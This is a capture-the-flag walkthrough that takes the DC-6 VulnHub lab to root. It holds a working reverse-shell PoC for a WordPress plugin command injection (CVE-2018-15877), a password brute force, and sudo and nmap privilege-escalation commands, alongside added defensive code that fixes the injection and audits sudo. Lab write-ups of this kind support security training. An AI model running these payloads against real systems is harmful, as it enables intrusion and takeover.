DC-6

0x00. Official description

DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

This isn’t an overly difficult challenge so should be great for beginners.

The ultimate goal of this challenge is to get root and to read the one and only flag.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.

0x01. The usual: nmap

From the host discovery, .1 is the gateway, .2 is the VM host machine and .6 is the Kali box, so .3 (the VMware MAC) must be the target.

root@JIYE:~/tmp/dc6# nmap -sP 192.168.1.0/24 -oN nmap.sP
# Nmap 7.80 scan initiated Thu Aug 27 02:09:08 2020 as: nmap -sP -oN nmap.sP 192.168.1.0/24
Nmap scan report for 192.168.1.1
Host is up (0.0028s latency).
MAC Address: 68:D1:BA:1F:FD:48 (Shenzhen Youhua Technology)
Nmap scan report for 192.168.1.2
Host is up (0.00040s latency).
MAC Address: 50:5B:C2:8C:BE:A5 (Liteon Technology)
Nmap scan report for 192.168.1.3
Host is up (0.00031s latency).
MAC Address: 00:0C:29:2B:C3:13 (VMware)
Nmap scan report for 192.168.1.6
Host is up.
# Nmap done at Thu Aug 27 02:09:10 2020 -- 256 IP addresses (4 hosts up) scanned in 2.06 seconds

0x02. Continue with nmap to enumerate ports and services

Ports 22 (OpenSSH 7.4p1) and 80 (Apache 2.4.25) are open, and the http-generator header gives away WordPress 5.1.1.

root@JIYE:~/vulnhub/dc6# nmap -sC -sV -v 192.168.1.3 -oN nmap.demo
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-27 03:05 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 03:05
Completed NSE at 03:05, 0.00s elapsed
Initiating NSE at 03:05
Completed NSE at 03:05, 0.00s elapsed
Initiating NSE at 03:05
Completed NSE at 03:05, 0.00s elapsed
Initiating ARP Ping Scan at 03:05
Scanning 192.168.1.3 [1 port]
Completed ARP Ping Scan at 03:05, 0.03s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 03:05
Scanning wordy (192.168.1.3) [1000 ports]
Discovered open port 80/tcp on 192.168.1.3
Discovered open port 22/tcp on 192.168.1.3
Completed SYN Stealth Scan at 03:05, 0.07s elapsed (1000 total ports)
Initiating Service scan at 03:05
Scanning 2 services on wordy (192.168.1.3)
Completed Service scan at 03:05, 6.08s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.1.3.
Initiating NSE at 03:05
Completed NSE at 03:05, 0.63s elapsed
Initiating NSE at 03:05
Completed NSE at 03:05, 0.02s elapsed
Initiating NSE at 03:05
Completed NSE at 03:05, 0.00s elapsed
Nmap scan report for wordy (192.168.1.3)
Host is up (0.000092s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
| 256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_ 256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-generator: WordPress 5.1.1
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Wordy – Just another WordPress site
|_https-redirect: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:2B:C3:13 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 03:05
Completed NSE at 03:05, 0.00s elapsed
Initiating NSE at 03:05
Completed NSE at 03:05, 0.00s elapsed
Initiating NSE at 03:05
Completed NSE at 03:05, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.28 seconds
Raw packets sent: 1001 (44.028KB) | Rcvd: 1001 (40.036KB)
root@JIYE:~/vulnhub/dc6#

0x03. Port 80 is open, so visit it directly

1. The page does not load: the site redirects to http://wordy, which does not resolve.

2. Add `192.168.1.3 wordy` to /etc/hosts and visit again; the site content mentions plugins.

3. Scan the WordPress directory structure

root@JIYE:~/vulnhub/dc6# dirb http://wordy
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Aug 27 02:19:37 2020
URL_BASE: http://wordy/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://wordy/ ----
+ http://wordy/index.php (CODE:301|SIZE:0)
+ http://wordy/server-status (CODE:403|SIZE:293)
==> DIRECTORY: http://wordy/wp-admin/
==> DIRECTORY: http://wordy/wp-content/
==> DIRECTORY: http://wordy/wp-includes/
+ http://wordy/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://wordy/wp-admin/ ----
+ http://wordy/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://wordy/wp-admin/css/
==> DIRECTORY: http://wordy/wp-admin/images/
==> DIRECTORY: http://wordy/wp-admin/includes/
+ http://wordy/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://wordy/wp-admin/js/
==> DIRECTORY: http://wordy/wp-admin/maint/
==> DIRECTORY: http://wordy/wp-admin/network/
==> DIRECTORY: http://wordy/wp-admin/user/
---- Entering directory: http://wordy/wp-content/ ----
+ http://wordy/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://wordy/wp-content/plugins/
==> DIRECTORY: http://wordy/wp-content/themes/
---- Entering directory: http://wordy/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://wordy/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://wordy/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://wordy/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://wordy/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://wordy/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://wordy/wp-admin/network/ ----
+ http://wordy/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://wordy/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://wordy/wp-admin/user/ ----
+ http://wordy/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://wordy/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://wordy/wp-content/plugins/ ----
+ http://wordy/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://wordy/wp-content/themes/ ----
+ http://wordy/wp-content/themes/index.php (CODE:200|SIZE:0)
-----------------
END_TIME: Thu Aug 27 02:20:11 2020
DOWNLOADED: 32284 - FOUND: 12
root@JIYE:~/vulnhub/dc6#

4. Visiting wp-admin redirects to wp-login.php

5. Enumerate users

Five users are found (via the RSS generator, the wp-json users endpoint, author-ID brute forcing and login error messages): admin, jens, graham, mark, sarah

root@JIYE:~/vulnhub/dc6# wpscan --url wordy -e u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.4
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://wordy/ [192.168.1.3]
[+] Started: Thu Aug 27 03:27:20 2020

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.25 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://wordy/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://wordy/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://wordy/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.1.1 identified (Insecure, released on 2019-03-13).
| Found By: Rss Generator (Passive Detection)
| - http://wordy/index.php/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>
| - http://wordy/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>

[+] WordPress theme in use: twentyseventeen
| Location: http://wordy/wp-content/themes/twentyseventeen/
| Last Updated: 2020-08-11T00:00:00.000Z
| Readme: http://wordy/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 2.4
| Style URL: http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1, Match: 'Version: 2.1'

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <====================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] jens
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] graham
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] mark
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] sarah
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Thu Aug 27 03:27:23 2020
[+] Requests Done: 59
[+] Cached Requests: 6
[+] Data Sent: 13.316 KB
[+] Data Received: 640.55 KB
[+] Memory used: 176.484 MB
[+] Elapsed time: 00:00:02
root@JIYE:~/vulnhub/dc6#

0x04. Brute-force the web application

1. Build the username list

root@JIYE:~/vulnhub/dc6# cat user.txt
admin
jens
graham
mark
sarah
root@JIYE:~/vulnhub/dc6#

2. Build the password list (the challenge hint is that the password contains "k01", so filter rockyou.txt on that substring)

root@JIYE:~/vulnhub/dc6# cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

3. Brute force

Found mark's password: helpdesk01

root@JIYE:~/vulnhub/dc6# wpscan --url wordy -U user.txt -P passwords.txt 
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

Trying graham / !lak019b Time: 00:02:30 <====================================================== > (12547 / 15215) 82.46% ETA: ??:??:??

[!] Valid Combinations Found:
| Username: mark, Password: helpdesk01

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Thu Aug 27 03:38:29 2020
[+] Requests Done: 12572
[+] Cached Requests: 33
[+] Data Sent: 5.874 MB
[+] Data Received: 7.392 MB
[+] Memory used: 232.938 MB
[+] Elapsed time: 00:02:33
root@JIYE:~/vulnhub/dc6#

0x05. Log in and browse manually

An activity monitor plugin is installed.

Earlier the site claimed its plugins were secure; let's check whether this one has known vulnerabilities.

There is an authenticated command injection vulnerability in it.

root@JIYE:~/vulnhub/dc6# searchsploit Activity Monitor
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Activity Monitor 2002 2.6 - Remote Denial of Service | windows/dos/22690.c
RedHat Linux 6.0/6.1/6.2 - 'pam_console' Monitor Activity After Logout | linux/local/19900.c
WordPress Plugin Plainview Activity Monitor 20161228 - (Authenticated) Command Injection | php/webapps/45274.html
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
root@JIYE:~/vulnhub/dc6#

0x06. Read the description in 45274.html

root@JIYE:~/vulnhub/dc6# cp /usr/share/exploitdb/exploits/php/webapps/45274.html .
root@JIYE:~/vulnhub/dc6# ls
45274.html 48724.txt nmap.A nmap.demo nmap.sP passwords.txt user.txt
root@JIYE:~/vulnhub/dc6# cat 45274.html
<!--
About:
===========
Component: Plainview Activity Monitor (Wordpress plugin)
Vulnerable version: 20161228 and possibly prior
Fixed version: 20180826
CVE-ID: CVE-2018-15877
CWE-ID: CWE-78
Author:
- LydA(c)ric Lefebvre (https://www.linkedin.com/in/lydericlefebvre)

Timeline:
===========
- 2018/08/25: Vulnerability found
- 2018/08/25: CVE-ID request
- 2018/08/26: Reported to developer
- 2018/08/26: Fixed version
- 2018/08/26: Advisory published on GitHub
- 2018/08/26: Advisory sent to bugtraq mailing list

Description:
===========
Plainview Activity Monitor Wordpress plugin is vulnerable to OS
command injection which allows an attacker to remotely execute
commands on underlying system. Application passes unsafe user supplied
data to ip parameter into activities_overview.php.
Privileges are required in order to exploit this vulnerability, but
this plugin version is also vulnerable to CSRF attack and Reflected
XSS. Combined, these three vulnerabilities can lead to Remote Command
Execution just with an admin click on a malicious link.

References:
===========
https://github.com/aas-n/CVE/blob/master/CVE-2018-15877/

PoC:
-->

<html>
<!-- Wordpress Plainview Activity Monitor RCE
[+] Version: 20161228 and possibly prior
[+] Description: Combine OS Commanding and CSRF to get reverse shell
[+] Author: LydA(c)ric LEFEBVRE
[+] CVE-ID: CVE-2018-15877
[+] Usage: Replace 127.0.0.1 & 9999 with you ip and port to get reverse shell
[+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well
-->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8000/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
<input type="hidden" name="ip" value="google.fr| nc -nlvp 127.0.0.1 9999 -e /bin/bash" />
<input type="hidden" name="lookup" value="Lookup" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>root@JIYE:~/vulnhub/dc6#
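The PoC works because the plugin splices the `ip` form field into a shell command (CWE-78), so `google.fr| nc ...` becomes a second command. The block below is an added example, not code from this write-up or from the Plainview plugin: it rebuilds that pattern in Python, with the vulnerable builder next to two hardened ones (argv list after an allow-list check, and `shlex.quote` as the analogue of PHP's `escapeshellarg()`). The lookup tool `host` and the function names are assumptions made for the example.

```python
"""
Added example, not part of the DC-6 write-up or of the Plainview Activity
Monitor plugin: the OS command injection pattern behind CVE-2018-15877
(CWE-78) rebuilt in Python, with the vulnerable builder next to two hardened
ones.  The plugin took the "ip" form field and handed it to a shell for a
lookup; the PoC's value 'google.fr| nc ... -e /bin/bash' turns that lookup into
two commands.  Assumed for the example: the lookup tool is `host`, and the
function names are ours.
"""
import ipaddress
import re
import shlex
import subprocess
from typing import List

# RFC 1123-shaped hostname: dot-separated labels of letters, digits and
# hyphens, no leading/trailing hyphen per label, at most 253 chars overall.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def build_lookup_vulnerable(ip: str) -> str:
    """Mirrors the bug: untrusted input spliced into a shell command string.
    Run through a shell, '|' and ';' inside `ip` act as command separators."""
    return "host " + ip


def is_valid_lookup_target(value: str) -> bool:
    """Allow-list check: an IPv4/IPv6 literal or a DNS hostname, nothing else."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    return _HOSTNAME_RE.match(value) is not None


def build_lookup_hardened(ip: str) -> List[str]:
    """Preferred fix: validate, then pass an argv list so no shell parses it."""
    if not is_valid_lookup_target(ip):
        raise ValueError(f"rejected lookup target: {ip!r}")
    return ["host", ip]


def build_lookup_quoted(ip: str) -> str:
    """Fallback when a shell string is unavoidable: quote the argument, the
    Python analogue of PHP's escapeshellarg().  The payload becomes one literal
    word instead of a second command."""
    return "host " + shlex.quote(ip)


def run_lookup(ip: str, timeout: float = 5.0) -> str:
    """Execute the hardened form (shell=False).  Does real DNS; not exercised
    by the offline checks."""
    proc = subprocess.run(
        build_lookup_hardened(ip),
        capture_output=True, text=True, timeout=timeout, check=False,
    )
    return proc.stdout


if __name__ == "__main__":
    payload = "google.fr| nc 192.168.1.6 9999 -e /bin/bash"  # value from the PoC
    print("vulnerable:", build_lookup_vulnerable(payload))
    print("quoted    :", build_lookup_quoted(payload))
    try:
        build_lookup_hardened(payload)
    except ValueError as exc:
        print("hardened  :", exc)
    print("hardened  :", build_lookup_hardened("google.fr"))
```

Input validation closes only the injection leg. The CSRF leg the PoC relies on (an authenticated admin submitting the attacker's form) is closed on the WordPress side by a nonce check such as `check_admin_referer()` on the handler, which the validation above does not replace.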

Modify the PoC: point the form at http://wordy and make the injected command connect back to the Kali box (192.168.1.6:9999)

<html>
<!-- Wordpress Plainview Activity Monitor RCE
[+] Version: 20161228 and possibly prior
[+] Description: Combine OS Commanding and CSRF to get reverse shell
[+] Author: LydA(c)ric LEFEBVRE
[+] CVE-ID: CVE-2018-15877
[+] Usage: Replace 127.0.0.1 & 9999 with you ip and port to get reverse shell
[+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well
-->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
<input type="hidden" name="ip" value="google.fr| nc 192.168.1.6 9999 -e /bin/bash" />
<input type="hidden" name="lookup" value="Lookup" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>root@JIYE:~/vulnhub/dc6#

0x07. Reverse shell

1. Start a listener on Kali

root@JIYE:~# nc -nvlp 9999

2. Open the modified PoC in Firefox (in the browser session that is logged in as mark)

root@JIYE:~/vulnhub/dc6# firefox 45274.html

Click the submit button and the listener gets a shell as www-data

root@JIYE:~# nc -nvlp 9999
listening on [any] 9999 ...
connect to [192.168.1.6] from (UNKNOWN) [192.168.1.3] 58196
whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

3. Upgrade the shell to a pty

python -c 'import pty;pty.spawn("/bin/bash")'
www-data@dc-6:/var/www/html/wp-admin$

4. Upgrade again to a fully interactive shell: Ctrl-Z to background nc, then `stty raw -echo` and `fg` on Kali (the `fg` is not echoed, which is why only the nc command line reappears below)

root@JIYE:~# stty raw -echo
root@JIYE:~# nc -nvlp 9999

www-data@dc-6:/var/www/html/wp-admin$
www-data@dc-6:/var/www/html/wp-admin$
www-data@dc-6:/var/www/html/wp-admin$ whoami
www-data
www-data@dc-6:/var/www/html/wp-admin$

0x08. Privilege escalation

1. `sudo -l` as www-data asks for a password, so nothing there yet

www-data@dc-6:/var/www/html$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

[sudo] password for www-data:
Sorry, try again

2. Look through the other users' home directories

mark's to-do list contains graham's password: GSo7isUM1D4

www-data@dc-6:/home$ ls *
graham:

jens:
backups.sh

mark:
stuff

sarah:
www-data@dc-6:/home$ cat jens/backups.sh
#!/bin/bash
tar -czf backups.tar.gz /var/www/html
www-data@dc-6:/home$ cd mark/stuff/
www-data@dc-6:/home/mark/stuff$ ls
things-to-do.txt
www-data@dc-6:/home/mark/stuff$ cat things-to-do.txt
Things to do:

- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement
www-data@dc-6:/home/mark/stuff$

Switch to graham with that password

www-data@dc-6:/home/mark/stuff$ su graham
Password:
graham@dc-6:/home/mark/stuff$ whoami
graham

`sudo -l` shows graham can run /home/jens/backups.sh as jens without a password, which can be abused

graham@dc-6:~$ sudo -l
Matching Defaults entries for graham on dc-6:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User graham may run the following commands on dc-6:
(jens) NOPASSWD: /home/jens/backups.sh
graham@dc-6:~$

Modify backups.sh and run it through sudo to become jens. The script is mode 775 and group-writable by devs, which is what lets graham replace what sudo will execute.

graham@dc-6:/home/jens$ ls -l
total 4
-rwxrwxr-x 1 jens devs 61 Aug 27 19:06 backups.sh
graham@dc-6:/home/jens$ cat backups.sh
#!/bin/bash
#tar -czf backups.tar.gz /var/www/html
/bin/bash
graham@dc-6:/home/jens$ sudo -u jens ./backups.sh
jens@dc-6:~

`sudo -l` as jens shows nmap can be run as root without a password, which is enough to escalate

jens@dc-6:~$ sudo -l
Matching Defaults entries for jens on dc-6:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jens may run the following commands on dc-6:
(root) NOPASSWD: /usr/bin/nmap
jens@dc-6:~$
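Both sudo hops on this box come from the same class of mistake: a NOPASSWD entry whose target the caller can rewrite (backups.sh), and one for a binary that will start a shell from inside itself (nmap). The script below is an added example, not from the write-up, that audits `sudo -l` output for those two patterns so the check can be repeated on the next box. It assumes one command per `(runas) NOPASSWD: /path` line, as printed on dc-6, and its spawner list is a short hand-picked subset rather than the full GTFOBins catalogue.

```bash
#!/usr/bin/env bash
# Added example, not from the DC-6 write-up: audit `sudo -l` output for the two
# misconfigurations chained on this box.
#  1. WRITABLE_TARGET: a NOPASSWD entry whose target file the caller can write
#     (graham -> jens via the group-writable /home/jens/backups.sh).
#  2. SHELL_SPAWNER: a NOPASSWD entry for a binary that can start a shell from
#     inside itself (jens -> root via `nmap --script`).
# Assumptions: one command per "(runas) NOPASSWD: /path" line, as on dc-6; the
# spawner list is a short hand-picked subset (GTFOBins has the full catalogue).

SHELL_SPAWNERS="nmap vim vi less more man awk find python python3 perl bash sh env"

audit_sudo_entries() {
    # $1: text of `sudo -l`; prints one finding per line, nothing if clean.
    printf '%s\n' "$1" |
    sed -n 's/^[[:space:]]*(\([^)]*\))[[:space:]]*NOPASSWD:[[:space:]]*\(.*\)$/\1 \2/p' |
    while read -r runas cmd _rest; do
        # Finding 1: whoever can edit the file decides what sudo executes as $runas.
        if [ -w "$cmd" ]; then
            printf 'WRITABLE_TARGET %s (runas %s)\n' "$cmd" "$runas"
        fi
        # Finding 2: the binary itself will hand out a shell as $runas.
        base=${cmd##*/}
        case " $SHELL_SPAWNERS " in
            *" $base "*) printf 'SHELL_SPAWNER %s (runas %s)\n' "$cmd" "$runas" ;;
        esac
    done
}

# Run against the live system only when asked, e.g. ./audit_sudo.sh --live
if [ "${1:-}" = "--live" ]; then
    audit_sudo_entries "$(sudo -n -l 2>/dev/null || true)"
fi
```

Run with `--live` on the target after getting a shell as each user; on dc-6 the graham run reports backups.sh as WRITABLE_TARGET and the jens run reports /usr/bin/nmap as SHELL_SPAWNER. The `-w` test reflects the calling user's permissions, so run it as the user whose sudo rights you are checking.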

3. Escalate via nmap --script (the NSE script is Lua, so os.execute gives a root shell)

jens@dc-6:~$ echo 'os.execute("/bin/bash")' > CTF
jens@dc-6:~$ sudo -u root nmap --script=CTF

Starting Nmap 7.40 ( https://nmap.org ) at 2020-08-27 19:50 AEST
NSE: Warning: Loading 'CTF' -- the recommended file extension is '.nse'.
root@dc-6:/home/jens# root@dc-6:/home/jens# root@dc-6:/home/jens#

4. The shell spawned from inside nmap does not behave interactively (typed commands produce nothing), so paste the python one-liner to spawn a pty:

python -c 'import pty;pty.spawn("/bin/bash")'  // copy and paste

root@dc-6:/home/jens# root@dc-6:/home/jens# root@dc-6:/home/jens# 
root@dc-6:/home/jens#
root@dc-6:/home/jens#
root@dc-6:/home/jens#
root@dc-6:/home/jens#
root@dc-6:/home/jens# ls
backups.sh CTF
root@dc-6:/home/jens# cd /root
root@dc-6:~# ls
theflag.txt
root@dc-6:~# cat theflag.txt


Yb dP 888888 88 88 8888b. dP"Yb 88b 88 888888 d8b
Yb db dP 88__ 88 88 8I Yb dP Yb 88Yb88 88__ Y8P
YbdPYbdP 88"" 88 .o 88 .o 8I dY Yb dP 88 Y88 88"" `"'
YP YP 888888 88ood8 88ood8 8888Y" YbodP 88 Y8 888888 (8)


Congratulations!!!

Hope you enjoyed DC-6. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.


root@dc-6:~#
------------- Short note, long sentiments; see you next time -------------